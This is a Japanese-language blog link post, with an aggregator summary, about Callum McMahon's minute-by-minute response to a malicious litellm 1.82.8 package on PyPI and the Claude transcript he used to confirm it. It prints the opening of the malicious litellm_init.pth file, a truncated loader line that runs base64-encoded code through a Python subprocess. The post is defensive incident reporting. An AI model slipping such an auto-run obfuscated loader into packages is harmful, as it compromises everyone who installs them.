LiteLLMマルウェア攻撃に対する分単位の対応記録

Simon Willison's Blog / 2026/3/27

📰 ニュースDeveloper Stack & InfrastructureSignals & Early TrendsTools & Practical Usage

要点

  • 本投稿は、報告されたLiteLLMマルウェア攻撃に対して分単位で迅速に対応した内容を述べており、隔離したDocker環境での検査によりPyPIの脆弱性が確認された手順も含まれています。
  • 著者は、悪意のあるLiteLLMパッケージ(litellm==1.82.8)がPyPI上で稼働しており、それをインストールまたはアップグレードした誰でも感染し得たと強調しています。
  • Claudeのトランスクリプトを用いて調査結果の裏取りを行い、さらに悪意のあるコードを確認した後、PyPIのセキュリティ担当者の連絡先アドレスまで提案されたことが述べられています。
  • Callum McMahonのワークフローと、共有されたトランスクリプトが、PyPIセキュリティへの有効なインシデント対応および報告プロセスの一部として提示されています。
  • 著者は、Callumが著者の「claude-code-transcripts」ツールを使って会話記録を公開したことに満足していると述べています。
スポンサー: WorkOS — エンタープライズのクライアントに販売する準備はできていますか? WorkOSで安全に構築して出荷しましょう。

2026年3月26日 - リンクブログ

LiteLLMのマルウェア攻撃への分刻みの対応via)Callum McMahonがLiteLLMのマルウェア攻撃をPyPIに報告しました。ここで彼は、脆弱性であることを確認し、その後どうするべきかを判断するのに役立てたClaudeのトランスクリプトを共有しています。Dockerコンテナ内で悪意のあるコードを確認した後、ClaudeはPyPIのセキュリティ担当者の連絡先アドレスまで提案しました:

確認済み。今、分離されたDockerコンテナ内でPyPIから新しくダウンロードすると:

Inspecting: litellm-1.82.8-py3-none-any.whl
FOUND: litellm_init.pth
SIZE: 34628 bytes
FIRST 200 CHARS:
import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('aW1wb3J0IHN1YnByb2Nlc3MKaW1wb3J0IHRlbXBmaWxl...")

悪意のある litellm==1.82.8今すぐPyPIで公開中であり、litellmをインストールまたはアップグレードする誰もが感染します。これはsecurity@pypi.orgへただちに報告する必要があります。

Callumが私のclaude-code-transcriptsツールを使って、会話のトランスクリプトを公開していたのを見てうれしかったです。

2026年3月26日 午後11時58分に投稿

これはSimon Willisonによるリンク投稿で、2026年3月26日に投稿されました。

pypi 46 security 585 ai 1934 generative-ai 1715 llms 1681 claude 264 supply-chain 14

月次ブリーフィング

$10/月でスポンサーになって、今月の最も重要なLLMの動向を厳選したメールダイジェストを受け取ってください。

こちらから送る量を減らすために、支払ってください!

スポンサーになる &購読する